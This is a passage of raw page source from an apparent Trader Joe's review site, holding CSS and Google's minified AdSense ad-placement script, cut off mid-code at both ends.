font-style: normal; font-weight: normal; font-family: "Merriweather",serif; } h1,h2,h3,h4,h5,h6, #container .heading-style, #container .price { font-style: normal; font-weight: normal; font-family: "Droid Sans",serif; } #container ul.products .button-small, #container form.cart, #container .login-block .icon-cart { display: none; } #footer .screen-reader-text { display: none; }</style> <meta data-pso-pv="1.2.1" data-pso-pt="front" data-pso-th="348a03183581ddaede3db06f9cb67236"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><script pagespeed_no_defer="" data-pso-version="20170403_083938">window.dynamicgoogletags={config:[]};dynamicgoogletags.config=["ca-pub-9328942793923645",[[[["DIV",null,"content",[]],["10px","10px",1],3,[3],"4932313013",0,null,null,4],[["HEADER",0,null,[]],["10px","10px",1],3,[2],"6409046214",0,null,null,6],[["BODY",0,null,[]],["10px","10px",1],2,[5],"7885779414",0,null,null,2]]],[[[[null,[[20,20]],null,34,1,1]],[[["BODY",0,null,[]],["10px","10px",1],1,[4],null,0,null,null,2],[["BODY",0,null,[]],["10px","10px",1],2,[5],null,0,null,null,2],[["DIV",null,"content",[]],["10px","10px",1],3,[3],null,0,null,null,4],[["HEADER",0,null,[]],["10px","10px",1],3,[2],null,0,null,null,6],[["DIV",0,null,["products"],1],["10px","10px",0],0,[0],null,0,null,null,17],[["DIV",0,null,["products"],2],["10px","10px",0],0,[0],null,0],[["DIV",0,null,["products"],-1],["10px","10px",0],3,[0],null,0,null,null,17],[["DIV",1,null,["products"],1],["10px","10px",0],0,[0],null,0,null,null,17],[["DIV",1,null,["products"],2],["10px","10px",0],0,[0],null,0],[["DIV",1,null,["products"],-1],["10px","10px",0],3,[0],null,0,null,null,17],[["DIV",0,null,["products"],3],["10px","10px",0],0,[0],null,0],[["DIV",1,null,["products"],3],["10px","10px",0],0,[0],null,0]],["1132738615","2609471813","4086205019","5562938216","7039671411"],["DIV",null,null,["products"]],"20170214_040801"]],"WordPressFront","1978846610",null,0.01,null,[null,1494916458450],0.01,0,null,null,"http://www.traderjoesreviews.com"];(function(){var h=this,aa=function(a){var b=typeof a;if("object"==b)if(a){if(a instanceof Array)return"array";if(a instanceof Object)return b;var c=Object.prototype.toString.call(a);if("[object Window]"==c)return"object";if("[object Array]"==c||"number"==typeof a.length&&"undefined"!=typeof a.splice&&"undefined"!=typeof a.propertyIsEnumerable&&!a.propertyIsEnumerable("splice"))return"array";if("[object Function]"==c||"undefined"!=typeof a.call&&"undefined"!=typeof a.propertyIsEnumerable&&!a.propertyIsEnumerable("call"))return"function"}else return"null"; else if("function"==b&&"undefined"==typeof a.call)return"object";return b},p=function(a){return"number"==typeof a},ba=function(a,b){var c=Array.prototype.slice.call(arguments,1);return function(){var b=c.slice();b.push.apply(b,arguments);return a.apply(this,b)}},r=function(a,b){function c(){}c.prototype=b.prototype;a.Ra=b.prototype;a.prototype=new c;a.prototype.constructor=a;a.Ta=function(a,c,f){for(var d=Array(arguments.length-2),e=2;e<arguments.length;e++)d[e-2]=arguments[e];return b.prototype[c].apply(a, d)}};var ca=String.prototype.trim?function(a){return a.trim()}:function(a){return a.replace(/^[\s\xa0]+|[\s\xa0]+$/g,"")},da=function(a,b){return a<b?-1:a>b?1:0},ea=function(a){return String(a).replace(/\-([a-z])/g,function(a,c){return c.toUpperCase()})};var fa=Array.prototype.forEach?function(a,b,c){Array.prototype.forEach.call(a,b,c)}:function(a,b,c){for(var d=a.length,e="string"==typeof a?a.split(""):a,f=0;f<d;f++)f in e&&b.call(c,e[f],f,a)};var ga=function(a){ga[" "](a);return a};ga[" "]=function(){};var ia=function(a,b){var c=ha;Object.prototype.hasOwnProperty.call(c,a)||(c[a]=b(a))};var t;a:{var ja=h.navigator;if(ja){var ka=ja.userAgent;if(ka){t=ka;break a}}t=""}var v=function(a){return-1!=t.indexOf(a)};var la=v("Opera"),w=v("Trident")||v("MSIE"),ma=v("Edge"),na=v("Gecko")&&!(-1!=t.toLowerCase().indexOf("webkit")&&!v("Edge"))&&!(v("Trident")||v("MSIE"))&&!v("Edge"),oa=-1!=t.toLowerCase().indexOf("webkit")&&!v("Edge"),pa=function(){var a=h.document;return a?a.documentMode:void 0},qa; a:{var ra="",sa=function(){var a=t;if(na)return/rv\:([^\);]+)(\)|;)/.exec(a);if(ma)return/Edge\/([\d\.]+)/.exec(a);if(w)return/\b(?:MSIE|rv)[: ]([^\);]+)(\)|;)/.exec(a);if(oa)return/WebKit\/(\S+)/.exec(a);if(la)return/(?:Version)[ \/]?(\S+)/.exec(a)}();sa&&(ra=sa?sa[1]:"");if(w){var ta=pa();if(null!=ta&&ta>parseFloat(ra)){qa=String(ta);break a}}qa=ra} var ua=qa,ha={},va=function(a){ia(a,function(){for(var b=0,c=ca(String(ua)).split("."),d=ca(String(a)).split("."),e=Math.max(c.length,d.length),f=0;0==b&&f<e;f++){var g=c[f]||"",k=d[f]||"";do{g=/(\d*)(\D*)(.*)/.exec(g)||["","","",""];k=/(\d*)(\D*)(.*)/.exec(k)||["","","",""];if(0==g[0].length&&0==k[0].length)break;b=da(0==g[1].length?0:parseInt(g[1],10),0==k[1].length?0:parseInt(k[1],10))||da(0==g[2].length,0==k[2].length)||da(g[2],k[2]);g=g[3];k=k[3]}while(0==b)}return 0<=b})},wa;var xa=h.document; wa=xa&&w?pa()||("CSS1Compat"==xa.compatMode?parseInt(ua,10):5):void 0;var x=function(){},ya="function"==typeof Uint8Array,z=function(a,b,c){a.a=null;b||(b=[]);a.Va=void 0;a.M=-1;a.l=b;a:{if(a.l.length){b=a.l.length-1;var d=a.l[b];if(d&&"object"==typeof d&&"array"!=aa(d)&&!(ya&&d instanceof Uint8Array)){a.R=b-a.M;a.G=d;break a}}a.R=Number.MAX_VALUE}a.Ua={};if(c)for(b=0;b<c.length;b++)d=c[b],d<a.R?(d+=a.M,a.l[d]=a.l[d]||y):a.G[d]=a.G[d]||y},y=[],A=function(a,b){if(b<a.R){b+=a.M;var c=a.l[b];return c===y?a.l[b]=[]:c}c=a.G[b];return c===y?a.G[b]=[]:c},Aa=function(a){a= A(za,a);return null==a?a:+a},B=function(a,b,c){b<a.R?a.l[b+a.M]=c:a.G[b]=c},C=function(a,b,c){a.a||(a.a={});if(!a.a[c]){var d=A(a,c);d&&(a.a[c]=new b(d))}return a.a[c]},D=function(a,b,c){a.a||(a.a={});if(!a.a[c]){for(var d=A(a,c),e=[],f=0;f<d.length;f++)e[f]=new b(d[f]);a.a[c]=e}b=a.a[c];b==y&&(b=a.a[c]=[]);return b},Ba=function(a,b,c){a.a||(a.a={});c=c||[];for(var d=[],e=0;e<c.length;e++)d[e]=E(c[e]);a.a[b]=c;B(a,b,d)},Ca=function(a){if(a.a)for(var b in a.a){var c=a.a[b];if("array"==aa(c))for(var d= 0;d<c.length;d++)c[d]&&E(c[d]);else c&&E(c)}},E=function(a){Ca(a);return a.l};x.prototype.toString=function(){Ca(this);return this.l.toString()};var Da=function(a){var b;if("array"==aa(a)){for(var c=Array(a.length),d=0;d<a.length;d++)null!=(b=a[d])&&(c[d]="object"==typeof b?Da(b):b);return c}if(ya&&a instanceof Uint8Array)return new Uint8Array(a);c={};for(d in a)null!=(b=a[d])&&(c[d]="object"==typeof b?Da(b):b);return c};var Ea=function(a,b){this.events=[];this.Ga=b||h;var c=null;b&&(b.google_js_reporting_queue=b.google_js_reporting_queue||[],this.events=b.google_js_reporting_queue,c=b.google_measure_js_timing);this.ia=null!=c?c:Math.random()<a};Ea.prototype.disable=function(){fa(this.events,this.ya,this);this.events.length=0;this.ia=!1};Ea.prototype.ya=function(a){var b=this.Ga.performance;a&&b&&b.clearMarks&&(b.clearMarks("goog_"+a.uniqueId+"_start"),b.clearMarks("goog_"+a.uniqueId+"_end"))};var Fa=function(){var a=!1;try{var b=Object.defineProperty({},"passive",{get:function(){a=!0}});h.addEventListener("test",null,b)}catch(c){}return a}();var Ha=function(){var a=Ga;try{var b;if(b=!!a&&null!=a.location.href)a:{try{ga(a.foo);b=!0;break a}catch(c){}b=!1}return b}catch(c){return!1}},Ia=function(a,b){for(var c in a)Object.prototype.hasOwnProperty.call(a,c)&&b.call(void 0,a[c],c,a)};var Ja=function(a,b,c,d,e){this.la=c||4E3;this.H=a||"&";this.wa=b||",$";this.T=void 0!==d?d:"trn";this.Sa=e||null;this.va=!1;this.V={};this.Ja=0;this.L=[]},Ma=function(a,b,c,d){b=b+"//"+c+d;var e=Ka(a)-d.length-0;if(0>e)return"";a.L.sort(function(a,b){return a-b});d=null;c="";for(var f=0;f<a.L.length;f++)for(var g=a.L[f],k=a.V[g],m=0;m<k.length;m++){if(!e){d=null==d?g:d;break}var l=La(k[m],a.H,a.wa);if(l){l=c+l;if(e>=l.length){e-=l.length;b+=l;c=a.H;break}else a.va&&(c=e,l[c-1]==a.H&&--c,b+=l.substr(0, c),c=a.H,e=0);d=null==d?g:d}}f="";a.T&&null!=d&&(f=c+a.T+"="+(a.Sa||d));return b+f+""},Ka=function(a){if(!a.T)return a.la;var b=1,c;for(c in a.V)b=c.length>b?c.length:b;return a.la-a.T.length-b-a.H.length-1},La=function(a,b,c,d,e){var f=[];Ia(a,function(a,k){(a=Na(a,b,c,d,e))&&f.push(k+"="+a)});return f.join(b)},Na=function(a,b,c,d,e){if(null==a)return"";b=b||"&";c=c||",$";"string"==typeof c&&(c=c.split(""));if(a instanceof Array){if(d=d||0,d<c.length){for(var f=[],g=0;g<a.length;g++)f.push(Na(a[g], b,c,d+1,e));return f.join(c[d])}}else if("object"==typeof a)return e=e||0,2>e?encodeURIComponent(La(a,b,c,d,e+1)):"...";return encodeURIComponent(String(a))};var Ra=function(a,b,c,d){var e=Pa;if((c?e.Pa:Math.random())<(d||e.za))try{var f;b instanceof Ja?f=b:(f=new Ja,Ia(b,function(a,b){var c=f,d=c.Ja++,e={};e[b]=a;a=[e];c.L.push(d);c.V[d]=a}));var g=Ma(f,e.Ma,e.Ba,e.La+a+"&");g&&Qa(g)}catch(k){}},Qa=function(a){h.google_image_requests||(h.google_image_requests=[]);var b=h.document.createElement("img");b.src=a;h.google_image_requests.push(b)};var Sa;if(!(Sa=!na&&!w)){var Ta;if(Ta=w)Ta=9<=Number(wa);Sa=Ta}Sa||na&&va("1.9.1");w&&va("9");var F=function(a,b,c,d){this.top=a;this.right=b;this.bottom=c;this.left=d};F.prototype.floor=function(){this.top=Math.floor(this.top);this.right=Math.floor(this.right);this.bottom=Math.floor(this.bottom);this.left=Math.floor(this.left);return this};var Ua=document,Va=window;var Wa=!!window.google_async_iframe_id,Ga=Wa&&window.parent||window;var Pa,G;if(Wa&&!Ha()){var Xa="."+Ua.domain;try{for(;2<Xa.split(".").length&&!Ha();)Ua.domain=Xa=Xa.substr(Xa.indexOf(".")+1),Ga=window.parent}catch(a){}Ha()||(Ga=window)}G=Ga;var Ya=new Ea(1,G);Pa=new function(){this.Ma="http:"===Va.location.protocol?"http:":"https:";this.Ba="pagead2.googlesyndication.com";this.La="/pagead/gen_204?id=";this.za=.01;this.Pa=Math.random()}; if("complete"==G.document.readyState)G.google_measure_js_timing||Ya.disable();else if(Ya.ia){var Za=function(){G.google_measure_js_timing||Ya.disable()};G.addEventListener?G.addEventListener("load",Za,Fa?void 0:!1):G.attachEvent&&G.attachEvent("onload",Za)};var H=function(a){this.na={};this.na.c=a;this.o=[];this.u=null;this.v=[];this.ea=0};H.prototype.g=function(a){for(var b=0;b<this.o.length;b++)if(this.o[b]==a)return this;this.o.push(a);return this};var $a=function(a,b){a.u=a.u?a.u:b;return a};H.prototype.C=function(a){for(var b=0;b<this.v.length;b++)if(this.v[b]==a)return this;this.v.push(a);return this}; H.prototype.getData=function(a){var b=this.na,c={},d;for(d in b)c[d]=b[d];0<this.ea&&(c.t=this.ea);c.err=this.o.join();c.warn=this.v.join();if(this.u){c.excp_n=this.u.name;c.excp_m=this.u.message&&this.u.message.substring(0,512);if(b=this.u.stack){d=this.u.stack;try{-1==d.indexOf("")&&(d="\n"+d);for(var e;d!=e;)e=d,d=d.replace(/((https?:\/..*\/)[^\/:]*:\d+(?:.|\n)*)\2/,"$1");b=d.replace(/\n */g,"\n")}catch(f){b=""}}c.excp_s=b}c.w=0<a.innerWidth?a.innerWidth:null;c.h=0<a.innerHeight?a.innerHeight: null;return c};var bb=function(a,b){ab(a,a.Ea,a.X,b)},ab=function(a,b,c,d){var e=d.u;d=d.getData(a.K);a.Ha?(d.type=b,a.K.console.log(d),e&&a.K.console.error(e)):0<c&&(d.r=c,Ra(b,d,"jserror"!=b,c))};var I=function(a){return a.dynamicgoogletags=a.dynamicgoogletags||{}};var J=function(a){z(this,a,cb)};r(J,x);var cb=[4];J.prototype.getId=function(){return A(this,3)};var K=function(a){z(this,a,null)};r(K,x);var db=function(a){z(this,a,null)};r(db,x);var L=function(a){return C(a,J,1)},fb=function(a){z(this,a,eb)};r(fb,x);var eb=[1];fb.prototype.i=function(){return D(this,db,1)};fb.prototype.pa=function(a){Ba(this,1,a)};var M=function(a){z(this,a,gb)};r(M,x);var gb=[2];M.prototype.ka=function(){return A(this,3)};M.prototype.qa=function(a){B(this,3,a)};var hb=function(a){z(this,a,null)};r(hb,x);var N=function(a){z(this,a,ib)};r(N,x);var ib=[1,2,3];N.prototype.i=function(){return D(this,db,2)}; N.prototype.pa=function(a){Ba(this,2,a)};var O=function(a){z(this,a,jb)};r(O,x);var jb=[3];O.prototype.A=function(){return A(this,1)};O.prototype.D=function(){return C(this,fb,2)};O.prototype.O=function(){return A(this,4)};O.prototype.ka=function(){return A(this,5)};O.prototype.qa=function(a){B(this,5,a)};O.prototype.N=function(){return C(this,kb,9)};var kb=function(a){z(this,a,null)};r(kb,x);var lb=function(a){this.m=a;this.sa=[]};lb.prototype.f=function(){return 0<D(this.m,N,3).length?D(this.m,N,3)[0]:null};var mb=function(a){var b=["adsbygoogle-placeholder"];a=a.className?a.className.split(/\s+/):[];for(var c={},d=0;d<a.length;++d)c[a[d]]=!0;for(d=0;d<b.length;++d)if(!c[b[d]])return!1;return!0};var nb=function(a,b){for(var c=0;c<b.length;c++){var d=b[c],e=ea(d.Wa);a[e]=d.value}},qb=function(a,b){var c=ob;b.setAttribute("data-adsbygoogle-status","reserved");b={element:b};(c=c&&c.Na)&&(b.params=c);pb(a).push(b)},pb=function(a){return a.adsbygoogle=a.adsbygoogle||[]};var rb=function(a,b){if(!a)return!1;a=b.getComputedStyle?b.getComputedStyle(a,null):a.currentStyle;if(!a)return!1;a=a.cssFloat||a.styleFloat;return"left"==a||"right"==a},sb=function(a){for(a=a.previousSibling;a&&1!=a.nodeType;)a=a.previousSibling;return a?a:null},tb=function(a){return!!a.nextSibling||!!a.parentNode&&tb(a.parentNode)};var ub=function(a,b){var c=a.length;if(null!=c)for(var d=0;d<c;d++)b.call(void 0,a[d],d)};var vb=function(a,b,c,d){this.ma=a;this.$=b;this.aa=c;this.P=d};vb.prototype.query=function(a){var b=[];try{b=a.querySelectorAll(this.ma)}catch(f){}if(!b.length)return[];a=b;b=a.length;if(0<b){for(var c=Array(b),d=0;d<b;d++)c[d]=a[d];a=c}else a=[];a=wb(this,a);p(this.$)&&(b=this.$,0>b&&(b+=a.length),a=0<=b&&b<a.length?[a[b]]:[]);if(p(this.aa)){b=[];for(c=0;c<a.length;c++){var d=xb(a[c]),e=this.aa;0>e&&(e+=d.length);0<=e&&e<d.length&&b.push(d[e])}a=b}return a}; vb.prototype.toString=function(){return JSON.stringify({nativeQuery:this.ma,occurrenceIndex:this.$,paragraphIndex:this.aa,ignoreMode:this.P})}; var wb=function(a,b){if(null==a.P)return b;switch(a.P){case 1:return b.slice(1);case 2:return b.slice(0,b.length-1);case 3:return b.slice(1,b.length-1);case 0:return b;default:throw Error("Unknown ignore mode: "+a.P);}},xb=function(a){var b=[];ub(a.getElementsByTagName("p"),function(a){100<=yb(a)&&b.push(a)});return b},yb=function(a){if(3==a.nodeType)return a.length;if(1!=a.nodeType||"SCRIPT"==a.tagName)return 0;var b=0;ub(a.childNodes,function(a){b+=yb(a)});return b},zb=function(a){return 0==a.length|| isNaN(a[0])?a:"\\"+(30+parseInt(a[0],10))+" "+a.substring(1)};var Ab=function(a,b){var c=0,d=A(a,6);if(void 0!==d)switch(d){case 0:c=1;break;case 1:c=2;break;case 2:c=3}var d=null,e=A(a,7);if(A(a,1)||a.getId()||0<A(a,4).length){var f=a.getId(),g=A(a,1),e=A(a,4),d=A(a,2);a=A(a,5);var k="";g&&(k+=g);f&&(k+="#"+zb(f));if(e)for(f=0;f<e.length;f++)k+="."+zb(e[f]);d=(e=k)?new vb(e,d,a,c):null}else e&&(d=new vb(e,A(a,2),A(a,5),c));return d?d.query(b):[]},Bb=function(a,b){if(a==b)return!0;if(!a||!b||A(a,1)!=A(b,1)||A(a,2)!=A(b,2)||a.getId()!=b.getId()||A(a,7)!=A(b, 7)||A(a,5)!=A(b,5)||A(a,6)!=A(b,6))return!1;a=A(a,4);b=A(b,4);if(a||b)if(a&&b&&a.length==b.length)for(var c=0;c<a.length;c++){if(a[c]!=b[c])return!1}else return!1;return!0};var Cb=function(a){a=a.document;return("CSS1Compat"==a.compatMode?a.documentElement:a.body)||{}},Db=function(a){return void 0===a.pageYOffset?(a.document.documentElement||a.document.body.parentNode||a.document.body).scrollTop:a.pageYOffset};var Eb=function(a,b){b=L(b);if(!b)return null;a=Ab(b,a);return 0<a.length?a[0]:null},Gb=function(a,b){b=Fb(a,b,!0);return p(b)&&!(b<=Cb(a).clientHeight)},Hb=function(a,b){return a.body?b-a.body.getBoundingClientRect().top:b},Fb=function(a,b,c){if(!c||!p(A(b,8))){var d=Eb(a.document,b);if(d){var e=null!=C(b,K,2)?A(C(b,K,2),3):void 0;c=a.document.createElement("div");c.className="googlepublisherpluginad";var f=c.style;f.textAlign="center";f.width="100%";f.height="0px";f.clear=e?"both":"none";Ib(c,d, A(b,3));d=c.getBoundingClientRect().top+Db(a);c.parentNode.removeChild(c);B(b,8,d)}}b=A(b,8);return p(b)?b-Db(a):null},Jb={0:0,1:1,2:2,3:3},Kb={0:"auto",1:"horizontal",2:"vertical",3:"rectangle"},Lb=function(a,b){a.sort(function(a,d){a=Fb(b,a,!0);a=p(a)?a:Number.POSITIVE_INFINITY;d=Fb(b,d,!0);d=p(d)?d:Number.POSITIVE_INFINITY;return a-d})},Ib=function(a,b,c){switch(Jb[c]){case 0:b.parentNode&&b.parentNode.insertBefore(a,b);break;case 3:if(c=b.parentNode){var d=b.nextSibling;if(d&&d.parentNode!=c)for(;d&& 8==d.nodeType;)d=d.nextSibling;c.insertBefore(a,d)}break;case 1:b.insertBefore(a,b.firstChild);break;case 2:b.appendChild(a)}if(1!=b.nodeType?0:"INS"==b.tagName&&mb(b))b.style.display="block"};var ob=new function(){this.ha="googlepublisherpluginad";this.Na={google_tag_origin:"pso"}},P=function(a){this.b=a;this.j=[];this.da=0;this.o=[];this.v=[];this.Y=null;this.oa=!1},Mb=function(a,b){a=C(a.f(),J,4);if(!(a&&b&&A(b,1)==A(a,1)&&b.getId()==a.getId()&&p(A(b,2))&&p(A(b,5))))return!1;a=A(a,4);b=A(b,4);if(a.length!=b.length)return!1;for(var c=0;c<a.length;++c)if(b[c]!=a[c])return!1;return!0},Nb=function(a){var b=p(void 0)?void 0:20,c=a.f(),d=c.i(),e=C(c,J,4);if(!(a.oa||0>=b)&&e&&0!=Ab(e,a.b.document).length){a.oa= !0;for(var c=[],f=0;f<d.length;++f){var g=d[f],k=L(g);if(Mb(a,k)){var m=A(k,2),k=A(k,5);null!=m&&null!=k&&0<=m&&0<=k&&(!c[m]||A(L(c[m]),5)<k)&&(c[m]=g)}}k=0;d=Ab(e,a.b.document);for(m=0;m<c.length&&k<b;++m){var e=k,f=a,l=d[m],g=c[m],k=b-k,u=f.f().i(),q=0;if(l&&g){l=xb(l).length;switch(A(L(g),6)){case 0:case 1:--l;break;case 2:l-=2}for(var n=A(L(g),5)+1;n<l&&q<k;++n){var Oa=new g.constructor(Da(E(g))),Hc=L(Oa);B(Hc,5,n);u.push(Oa);q++}}q&&f.f().pa(u);k=e+q}}}; P.prototype.g=function(a){for(var b=0;b<this.o.length;++b)if(this.o[b]==a)return;this.o.push(a)};P.prototype.C=function(a){for(var b=0;b<this.v.length;++b)if(this.v[b]==a)return;this.v.push(a)}; var Ob=function(a,b,c){var d=Jb[A(b,3)],e=Eb(a.b.document,b);if(e){var f=L(b)?A(L(b),2):void 0,g;a:{g=a.b;if(null!=f)switch(d){case 0:g=rb(sb(e),g);break a;case 3:g=rb(e,g);break a;case 2:f=e.lastChild;g=rb(f?1==f.nodeType?f:sb(f):null,g);break a}g=!1}if(!g&&(c||2!=d||tb(e))&&(c=1==d||2==d?e:e.parentNode,!c||(1!=c.nodeType?0:"INS"==c.tagName&&mb(c))||!(0>=c.offsetWidth)))a:if(A(b,7))a.C(8);else{b:if(A(b,5))c=A(b,5);else{if(c=Q(a).f())if(c=A(c,3),a.da<c.length){c=c[a.da++];break b}a.g(4);c=null}if(null!= c){B(b,7,!0);d=[];(g=a.O())&&d.push(g);g=Q(a).sa;for(f=0;f<g.length;++f)d.push(g[f]);p(A(b,9))&&d.push("pso-lv-"+A(b,9));var k=a.b.document;g=a.A();var f=A(b,6),f=null!=f?Kb[f]:f,m=C(b,K,2),l={};m&&(l.ra=A(m,1),l.ga=A(m,2),l.xa=!!A(m,3));var m=c,u=ob,q=k.createElement("div"),n=q.style;n.textAlign="center";n.width="100%";n.height="auto";n.clear=l.xa?"both":"none";l.Ka&&nb(n,l.Ka);k=k.createElement("ins");n=k.style;n.display="block";n.margin="auto";n.backgroundColor="transparent";l.ra&&(n.marginTop= l.ra);l.ga&&(n.marginBottom=l.ga);l.ta&&nb(n,l.ta);q.appendChild(k);k.setAttribute("data-ad-format",f?f:"auto");if(f=u&&u.ha)q.className=f;k.className="adsbygoogle";k.setAttribute("data-ad-client",g);m&&k.setAttribute("data-ad-slot",m);d.length&&k.setAttribute("data-ad-channel",d.join("+"));Ib(q,e,A(b,3));try{qb(a.b,k)}catch(Oa){A(b,5)!=c&&a.da--;B(b,7,!1);a.C(6);q&&q.parentNode&&q.parentNode.removeChild(q);break a}a.j.push(q)}}}},Pb=function(a,b){for(var c=Number.POSITIVE_INFINITY,d=0;d<a.j.length;++d)var e= a.j[d].getBoundingClientRect().top,f=a.j[d].getBoundingClientRect().bottom,c=Math.min(c,b<e?e-b:f<b?b-f:0);return c},Q=function(a){a=I(a.b).ps||null;if(!a)throw Error("No placementState");return a},Qb=function(a,b){var c=Q(a).m;if(!c||!c.A())return a.g(5),!1;c=D(c,N,3)[0];return c?A(c,3).length<b?(a.g(4),a.g(5),!1):!0:(a.g(5),!1)};P.prototype.A=function(){return Q(this).m.A()||""};P.prototype.O=function(){return Q(this).m.O()||void 0};P.prototype.D=function(){return Q(this).m.D()||new fb}; P.prototype.f=function(){var a=Q(this).f();if(!a)throw Error("No mConfig");return a};var Rb=function(a){a=A(a.f(),6);return null!=a&&0<a};var Sb=function(){this.I=this.J=this.ba=null};var R=function(a){P.call(this,a)};r(R,P);R.prototype.apply=function(a){var b;(b=Q(this).m)&&b.A()&&b.D()?b=!0:(this.g(5),b=!1);if(b){b=this.D().i();for(var c=0;c<b.length;c++){var d=b[c];A(d,7)||Ob(this,d,a)}}};R.prototype.B=function(){return(0==this.D().i().length||0<this.j.length)&&0==this.o.length};var Tb=function(a){P.call(this,a);if(Qb(this,0)){a=this.D().i();for(var b=this.f().i(),c=0;c<a.length;c++){var d=a[c],e;a:{e=d;var f=b;if(e&&L(e))for(var g=0;g<f.length;g++){var k=f[g];if(A(e,3)==A(k,3)&&Bb(L(e),L(k))){e=k;break a}}e=null}e&&C(e,K,2)&&(e=C(e,K,2),d.a||(d.a={}),f=e?E(e):e,d.a[2]=e,B(d,2,f))}}};r(Tb,R);var Vb=function(a,b){var c=void 0===b.pageXOffset?(b.document.documentElement||b.document.body.parentNode||b.document.body).scrollLeft:b.pageXOffset,d=Db(b);if(a.getBoundingClientRect)return a=a.getBoundingClientRect(),Ub(a)?new F(a.top+d,a.right+c,a.bottom+d,a.left+c):new F(0,0,0,0);b=b.document.createRange();b.selectNodeContents(a);return b.collapsed?new F(0,0,0,0):b.getBoundingClientRect?(a=b.getBoundingClientRect(),Ub(a)?new F(a.top+d,a.right+c,a.bottom+d,a.left+c):new F(0,0,0,0)):new F(0,0,0, 0)},Ub=function(a){return!!a&&p(a.top)&&!isNaN(a.top)&&p(a.right)&&!isNaN(a.right)&&p(a.bottom)&&!isNaN(a.bottom)&&p(a.left)&&!isNaN(a.left)};var $b=function(a){this.K=a;this.Fa=Wb(a);this.ua=S("ins.adsbygoogle",a);this.fa=Xb(a);this.Oa=S("[__lsu_res=reserved]",a);this.U=[];a=Yb(this);for(var b=0;b<a.length;b++)this.U.push(new Zb(a[b]))},Wb=function(a){var b=a.googletag;if(!b||"function"!=typeof b.pubads)return S("div[id^=div-gpt-ad]",a);var c=[];try{for(var d=b.pubads().getSlots(),b=0;b<d.length;b++){var e=d[b].getSlotElementId(),f=a.document.getElementById(e);null!=f&&c.push(f)}}catch(g){Ra("ladd_evt",{ok:0,err:g.toString()},!0,.1)}return c}, Xb=function(a){return S("iframe[id^=aswift_],iframe[id^=google_ads_frame]",a)},S=function(a,b){return Array.prototype.slice.call(b.document.querySelectorAll(a))},Yb=function(a){return[].concat(a.Fa,a.ua,a.fa,a.Oa)},Zb=function(a){this.Ca=a;this.W=null};var T=function(a){P.call(this,a)};r(T,P);T.prototype.apply=function(){};T.prototype.B=function(){var a;if(Rb(this)){a=this.b;var b=Wb(a);a=0<[].concat(b,S("ins.adsbygoogle",a),Xb(a),S("[__lsu_res=reserved]",a)).length}else a=!0;return a};var ac=function(a){P.call(this,a);this.F=null};r(ac,P); ac.prototype.apply=function(a){if(a&&Qb(this,2)){Nb(this);a=Cb(this.b).clientHeight||640;null==this.F&&(this.F=new $b(this.b));var b=this.F.fa.length;if(!(5<=b)){var b=Math.min(2,5-b),c=this.f().i();Lb(c,this.b);for(var d=0;d<c.length&&this.j.length<b;++d){var e=c[d];if(Gb(this.b,e)){var f=Fb(this.b,e,!0);if(void 0!==f){var g;a:{g=this.F;for(var k=a,m=f,l=0;l<g.U.length;l++){var u=m,q=k,n;n=g.U[l];n.W||(n.W=Vb(n.Ca,g.K));n=n.W;if(n.top-q<u&&u<n.bottom+q){g=!0;break a}}g=!1}g||Pb(this,f)<a||Ob(this, e,!0)}}}0==this.j.length&&this.C(1)}}};ac.prototype.B=function(){return Rb(this)?0<Yb(this.F).length:!0};var bc=function(a){P.call(this,a);this.Z=!1};r(bc,T); bc.prototype.apply=function(a){if(a&&!this.Z){var b;a:{var c=this.b.document;b=c.body;if(a&&b){a=this.A();var d=ob,e=c.createElement("div");e.style.display="block";if(d=d&&d.ha)e.className=d;c=c.createElement("ins");c.className="adsbygoogle";c.setAttribute("data-ad-client",a);c.setAttribute("data-reactive-ad-format","1");c.style.display="none";e.appendChild(c);Ib(e,b,2);try{qb(this.b,c)}catch(f){this.C(6);e&&e.parentNode&&e.parentNode.removeChild(e);b=5;break a}this.j.push(e);b=0}else b=4}this.Z= 0==b}};bc.prototype.B=function(){return this.Z&&T.prototype.B.call(this)};var cc=function(a){P.call(this,a);a=Cb(a).clientHeight;this.Aa=.1*a;this.Ia=.75*a};r(cc,P); cc.prototype.apply=function(a){if(Qb(this,3)&&!this.B()){Nb(this);var b=this.f().i();Lb(b,this.b);var c;c=this.Aa;var d;d=document;d=d.querySelectorAll?d.querySelectorAll("header,#header,#masthead,.header,.site-header"):[];for(var e=d.length,f=0<e?d[0]:null,g=1;g<e;g++)d[g].getBoundingClientRect().top<f.getBoundingClientRect().top&&(f=d[g]);(d=f)&&(d=d.getBoundingClientRect())&&d.top!=d.bottom&&d.left!=d.right&&(c=Math.min(c,Hb(document,d.bottom)));for(d=0;d<b.length&&3>this.j.length;d++){e=b[d]; var f=c,g=this.b.document,k=Fb(this.b,e,!1);!p(k)||Hb(g,k)<f?f=!1:(f=Pb(this,k),f=this.Ia<f);f&&(f=Gb(this.b,e),g=A(e,6)||0,f&&0==g&&B(e,6,3),!f&&a||Ob(this,e,a))}}};cc.prototype.B=function(){return 3==this.j.length};var U={};U[16]=R;U[17]=R;U[19]=T;U[29]=ac;U[33]=T;U[30]=bc;U[28]=cc;U[34]=cc;U[32]=Tb;U[1]=R;U[8]=T;U[11]=R;var dc=[19,29,33,30,16,32,17,34],ec=[16,19,33,30,17,1,6,8,11];var fc=function(a,b){a=a.google_ad_modifications=a.google_ad_modifications||{};(a.ad_channels=a.ad_channels||[]).push(b)};var gc=function(a){return 0>a||99<a?null:10>a?"0"+a:""+a};var hc=function(a,b){a=a.google_ad_modifications=a.google_ad_modifications||{};a=a.loeids=a.loeids||[];for(var c=0;c<b.length;c++)a.push(b[c])};var ic=function(a,b,c){this.ja=a;this.Da=c?c:new kb};ic.prototype.N=function(){return this.Da||new kb};var jc=function(a){if(!p(a))return!1;for(var b=0;b<dc.length;++b)if(a==dc[b])return!1;return!0},oc=function(){var a=V,b=kc,c=lc,d=b.f();if(!d)return mc(16);var e=null,f;a:{var g=D(d,M,1);for(f=0;f<g.length;++f){for(var k=!0,m=0;m<ec.length;++m)A(g[f],4)==ec[m]&&(k=!1);if(k){g=[];0==d.i().length&&g.push("PsoInvalidVariant");0==A(d,3).length&&g.push("PsoNoAdSlotCodes");f=g;break a}}f=[]}g=c.ja;if(0==f.length)a:{e=D(d,M,1);if(p(g))for(f=0;f<e.length;f++)if(k=e[f],U[A(k,4)])for(var m=D(k,hb,2),l=0;l< m.length;l++){var u=m[l],q=A(u,1),u=A(u,2);if(p(q)&&p(u)&&g>=q&&g<=u){e=k;break a}}e=null}else 